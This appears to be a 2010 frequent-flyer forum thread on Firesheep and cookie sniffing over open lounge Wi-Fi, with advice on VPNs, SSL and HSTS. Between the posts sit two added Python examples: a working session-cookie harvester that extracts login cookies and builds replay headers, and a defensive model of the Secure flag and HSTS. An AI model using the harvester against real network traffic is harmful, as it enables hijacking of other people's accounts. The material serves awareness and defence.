
MLL, Firesheep, and do you really think you are secure?

Old Nov 4, 10, 2:19 pm
  #1  
Original Poster
 
Join Date: Apr 2000
Location: Mississauga Ontario
Posts: 3,689

Theoretically, someone could sit in a MLL somewhere, and open FireFox, and run Firesheep, and from there:

-- log into the Facebook accounts of multiple people who are in the MLL RIGHT NOW

-- access the WSJ account of someone who is logged into the MLL right now

... and access other accounts which are accessed in the clear through non-encrypted connections.

Entirely theoretical. But suppose someone was reading your account right now?

If you haven't heard of Firesheep in the last week, and you are using any http:// connection for things through unprotected Wi-Fi, do you really think you are secure?

It could be something to think about. Entirely theoretical, of course.
InTheAirGuy is offline  
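What the original poster describes is session hijacking from passive sniffing: the browser sends its session cookies in the clear on every http:// request, so anyone on the same open Wi-Fi can read them and replay them. The following is an added example, not code from the thread or from Firesheep itself, showing the mechanism on constructed sample traffic. The per-site cookie names used to recognise a logged-in session are assumptions for illustration, not the real ones.

```python
# Added example (not from the thread): a minimal Firesheep-style harvester that
# pulls session cookies out of plaintext HTTP requests seen on a shared network.
# The captured requests are constructed; the cookie names per site are assumed.
from collections import defaultdict

# Assumed (hypothetical) cookie names that together identify a login per site.
SESSION_COOKIES = {
    "www.facebook.com": {"c_user", "xs"},
    "online.wsj.com": {"session_id"},
}

# Constructed sample: what a sniffer on open Wi-Fi sees for http:// traffic.
CAPTURED_REQUESTS = [
    b"GET /home.php HTTP/1.1\r\nHost: www.facebook.com\r\n"
    b"Cookie: datr=abc123; c_user=100001; xs=deadbeef\r\n\r\n",
    b"GET /article HTTP/1.1\r\nHost: online.wsj.com\r\n"
    b"Cookie: session_id=s3cr3t; tracking=xyz\r\n\r\n",
    b"GET / HTTP/1.1\r\nHost: example.org\r\nCookie: prefs=dark\r\n\r\n",
    b"GET /no-cookie HTTP/1.1\r\nHost: www.facebook.com\r\n\r\n",
]


def parse_request(raw):
    """Return (host, {cookie_name: value}) for one plaintext HTTP request."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    host, cookies = None, {}
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        if name == "host":
            host = value.lower()
        elif name == "cookie":
            for part in value.split(";"):
                k, _, v = part.strip().partition("=")
                if k:
                    cookies[k] = v
    return host, cookies


def harvest(requests):
    """Group hijackable sessions by host: one cookie dict per captured login."""
    sessions = defaultdict(list)
    for raw in requests:
        host, cookies = parse_request(raw)
        wanted = SESSION_COOKIES.get(host)
        if not wanted:
            continue                              # site not in the handler table
        stolen = {k: v for k, v in cookies.items() if k in wanted}
        if stolen.keys() == wanted:               # need the full set to replay
            sessions[host].append(stolen)
    return dict(sessions)


def replay_header(stolen):
    """Cookie header the attacker attaches to their own request to that site."""
    return "Cookie: " + "; ".join(f"{k}={v}" for k, v in stolen.items())


if __name__ == "__main__":
    for host, logins in harvest(CAPTURED_REQUESTS).items():
        for login in logins:
            print(host, "->", replay_header(login))
```

Nothing here breaks any cryptography: the cookies were never encrypted on the wire, and the site cannot distinguish the attacker's replayed request from the victim's. The request without a cookie and the host with no session cookies are skipped, which is all the filtering a tool like this needs.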
Old Nov 4, 10, 2:43 pm
  #2  
 
Join Date: Oct 2008
Location: YYC
Programs: AC SE100K, Hyatt Globalist
Posts: 4,033
Not theoretical at all. This is a huge risk for individuals and smaller companies that don't have the resources/knowledge to implement properly secured systems.

I use and recommend WiTopia (http://www.witopia.net), a personal VPN that is useful both for unsecured wireless connections and for all connections in countries that have many prying eyes.
rehoult is offline  
Old Nov 4, 10, 4:22 pm
  #3  
 
Join Date: Sep 2010
Location: Earth
Programs: AC S100K (formerly AC*SE), AC 2MM, AMEX Plat, Marriott Platinum Elite
Posts: 1,469
Originally Posted by rehoult View Post
Not theoretical at all. This is a huge risk for individuals and smaller companies that don't have the resources/knowledge to implement properly secured systems.

I use and recommend WiTopia (http://www.witopia.net), a personal VPN that is useful both for unsecured wireless connections and for all connections in countries that have many prying eyes.
Good tip!
2MM_Guy is offline  
Old Nov 4, 10, 6:20 pm
  #4  
 
Join Date: Nov 2001
Location: YYZ
Programs: Earned: AC SE, AA PLT - Comped: DL PLT, Avis PC, Hertz Platinum
Posts: 781
Originally Posted by InTheAirGuy View Post
Theoretically, someone could sit in a MLL somewhere, and open FireFox, and run Firesheep, and from there:

-- log into the Facebook accounts of multiple people who are in the MLL RIGHT NOW

-- access the WSJ account of someone who is logged into the MLL right now

... and access other accounts which are accessed in the clear through non-encrypted connections.

Entirely theoretical. But suppose someone was reading your account right now?

If you haven't heard of Firesheep in the last week, and you are using any http:// connection for things through unprotected Wi-Fi, do you really think you are secure?

It could be something to think about. Entirely theoretical, of course.
Of course, this is nothing new, and was all very possible before firesheep was released.. It just lowered the barrier to entry for who can do it...

However, anybody has been able to packet sniff http connections on wifi networks for a very, very long time.
mattm00se is offline  
Old Nov 4, 10, 7:24 pm
  #5  
 
Join Date: Jul 2008
Programs: Via Preference Privilege, AC*A, Fairmont Plat, SPG Gold
Posts: 1,333
Originally Posted by rehoult View Post
I use and recommend WiTopia (http://www.witopia.net), a personal VPN that is useful both for unsecured wireless connections and for all connections in countries that have many prying eyes.
All this does is change the point of attack. You're trusting a VPN provider to not sniff out your sessionid and use your Facebook account. The real solution is sites have to start sending the sessionid over SSL, and hopefully this will push them to do so.
will5404 is offline  
Old Nov 4, 10, 8:06 pm
  #6  
 
Join Date: Oct 2008
Location: YYC
Programs: AC SE100K, Hyatt Globalist
Posts: 4,033
Originally Posted by will5404 View Post
All this does is change the point of attack. Your trusting a VPN provider to not sniff out your sessionid and use your Facebook account. The real solution is sites have to start sending the sessionid over SSL, and hopefully this will push them to do so.
That is true, but there is too much competition in the VPN field for any sane provider to risk cheating their customers. They'd be out of business overnight. I'm not a shill for them (only a user), but I think they say it best:

The bottom line is, compared to your Internet provider, a hotspot/network owner, or even a government, we have a vested interest in vigorously maintaining your data security and privacy.

After all, that is what you pay us to do.

Not to be too capitalistic or simplistic about it, but that really is quite an incentive. This is how we earn our livelihoods. We don't sell ads. We don't have side jobs. This is it. You pay us money and we do everything we can to provide you the best service and protection possible.

If we don't do it well, or somehow betrayed your trust, we'd guess you'd go elsewhere in an Internet minute. Knowing that, we will strive to earn your trust every single day and, hopefully, year after year.
rehoult is offline  
Old Nov 4, 10, 9:42 pm
  #7  
 
Join Date: Jan 2009
Location: YYZ
Posts: 108
It's sad that websites haven't broadly deployed SSL and STS.

Anyone that has fired up BackTrack in a public place has soon learnt... once you see all the twisted pages people around you are loading up... ignorance can be bliss. Especially if I'm spending 15 hours strapped into a pressurized metal tube with my wifi neighbors.

Anyone tried this on AirCell's GoGo? "Ladies and gentlemen, Air Canada would like to remind you that complaining about our craptastic IFE system from FL370 is just as distasteful as snooping your seat mate's session cookies. Stolen facebook accounts are complimentary for passengers in the Executive cabin, and are available to passengers in economy for $6"
dcottom is offline  
Old Nov 5, 10, 12:09 am
  #8  
 
Join Date: Jul 2007
Location: Vancouver, BC
Programs: AE, SPG, HH
Posts: 340
SSL is more processor intensive as well as uses slightly more bandwidth. Not sure if this is why it hasn't been implemented on a lot of websites but you can definitely use it with facebook.

As others have suggested, a private VPN session or an SSH tunnel will work. I use VyprVPN by Giganews whenever I'm in a public hotspot. Ultimately there's no true solution for privacy as everything can be broken down - including a wired connection. Anyone that's used Wireshark would have been able to see all this data that Firesheep is showing - Firesheep just makes it that much easier and requires less tech knowledge than Wireshark (at least that's what I'm assuming, seeing as it's getting this much publicity.)

Want to protect yourself? Don't use a hotspot you don't trust. Don't use a hotspot that doesn't employ any form of encryption. Use a VPN session, SSH tunnel or at the very least SSL websites. Don't know if your website supports SSL? Change the "http://" to "https://" and see if it loads. If it does, you're in business; if not, see option #1 or #2.

Security's my thing!
helraiser is offline  
Old Nov 5, 10, 10:57 am
  #9  
 
Join Date: Jan 2009
Location: YYZ
Posts: 108
The annoying thing is sites (i.e. Facebook) that give you an SSL login, then redirect you back to straight-up http for the rest, blasting your session cookies around in clear text. Undoubtedly it's about money and infrastructure, both things SSL certs require more of.

It would be nice if the new datavalet portal in the MLL could be upgraded to allow WPA connections similar to some of the wifi providers you see in HKG and NRT? ...sign in with your E/SE number and it farts back / sms you a pass phrase for the protected network...
dcottom is offline  
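The "SSL login, then plain http" pattern in the post above, and the STS point from the same poster earlier in the thread, come down to two headers on the login response. A cookie set without the Secure attribute is sent by the browser on any later http:// request to that host, which is exactly what a sniffer needs; with Secure it is withheld over http, and with Strict-Transport-Security the browser never makes the http:// request in the first place. The following is an added example, not code from the thread, that models that browser behaviour on constructed responses; the host and cookie names are assumptions for illustration.

```python
# Added example (not from the thread): a tiny model of a browser's cookie jar
# and HSTS cache, used to show what the Secure flag and Strict-Transport-Security
# change for a session cookie issued at an https:// login. Responses, host and
# cookie names are constructed for the example.
from urllib.parse import urlsplit


class Browser:
    """Minimal cookie jar plus HSTS cache, enough to show the leak."""

    def __init__(self):
        self.jar = {}      # (host, cookie_name) -> (value, secure_flag)
        self.hsts = set()  # hosts that must only be fetched over https

    def receive(self, url, response):
        """Apply Set-Cookie and Strict-Transport-Security from a response."""
        parts = urlsplit(url)
        for line in response.split("\r\n")[1:]:          # skip status line
            name, _, value = line.partition(":")
            name, value = name.strip().lower(), value.strip()
            if name == "set-cookie":
                pair, *attrs = [p.strip() for p in value.split(";")]
                cname, _, cval = pair.partition("=")
                secure = any(a.lower() == "secure" for a in attrs)
                self.jar[(parts.hostname, cname)] = (cval, secure)
            elif name == "strict-transport-security" and parts.scheme == "https":
                self.hsts.add(parts.hostname)            # HSTS over http is ignored

    def request(self, url):
        """Return (scheme actually used, Cookie header value that goes on the wire)."""
        parts = urlsplit(url)
        scheme = "https" if parts.hostname in self.hsts else parts.scheme
        sent = [f"{n}={v}" for (h, n), (v, secure) in self.jar.items()
                if h == parts.hostname and (scheme == "https" or not secure)]
        return scheme, "; ".join(sent)


# Constructed login responses: the weak one, the half-fix, and the full fix.
LOGIN_PLAIN = "HTTP/1.1 200 OK\r\nSet-Cookie: sid=abc123; Path=/\r\n\r\n"
LOGIN_SECURE_ONLY = "HTTP/1.1 200 OK\r\nSet-Cookie: sid=abc123; Path=/; Secure; HttpOnly\r\n\r\n"
LOGIN_FIXED = ("HTTP/1.1 200 OK\r\n"
               "Set-Cookie: sid=abc123; Path=/; Secure; HttpOnly\r\n"
               "Strict-Transport-Security: max-age=31536000\r\n\r\n")


def after_login(login_response):
    """Log in over https, then follow a plain http:// link on the same site.

    Returns (scheme used for the follow-up request, Cookie header sent).
    """
    b = Browser()
    b.receive("https://www.example.com/login", login_response)
    return b.request("http://www.example.com/home")


def leaks_session(login_response):
    """True if the session cookie travels over plain http after login."""
    scheme, cookie_header = after_login(login_response)
    return scheme == "http" and "sid=" in cookie_header


if __name__ == "__main__":
    for label, resp in [("no Secure, no HSTS", LOGIN_PLAIN),
                        ("Secure only", LOGIN_SECURE_ONLY),
                        ("Secure + HSTS", LOGIN_FIXED)]:
        print(f"{label:20} -> {after_login(resp)}  leaks={leaks_session(resp)}")
```

The middle case is worth noting: Secure alone stops the leak, but the http:// request still goes out without the cookie, so the user simply appears logged out on that page. Only the site moving fully to https, with STS to keep the browser there, gives both the protection and a working site.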
Old Nov 5, 10, 2:52 pm
  #10  
 
Join Date: Jun 2003
Location: YVR
Programs: AC E75, SPG Plat, HH peon-by-choice (ex Gold)
Posts: 8,090
That's why I only use wired access in lounges and never login to anything on unprotected wifi networks.
Braindrain is offline  
Old Nov 5, 10, 8:44 pm
  #11  
 
Join Date: Oct 2006
Location: YYZ/DLC
Programs: AP, CX Gold, HHonours Gold, SPG Gold, KL/AF Gold
Posts: 3,679
Originally Posted by Braindrain View Post
That's why I only use wired access in lounges and never login to anything on unprotected wifi networks.
You and I have the same habit! Nothing is absolute, but Ethernet will fend off most of the casual Joe-Hackers.
payam81 is offline  
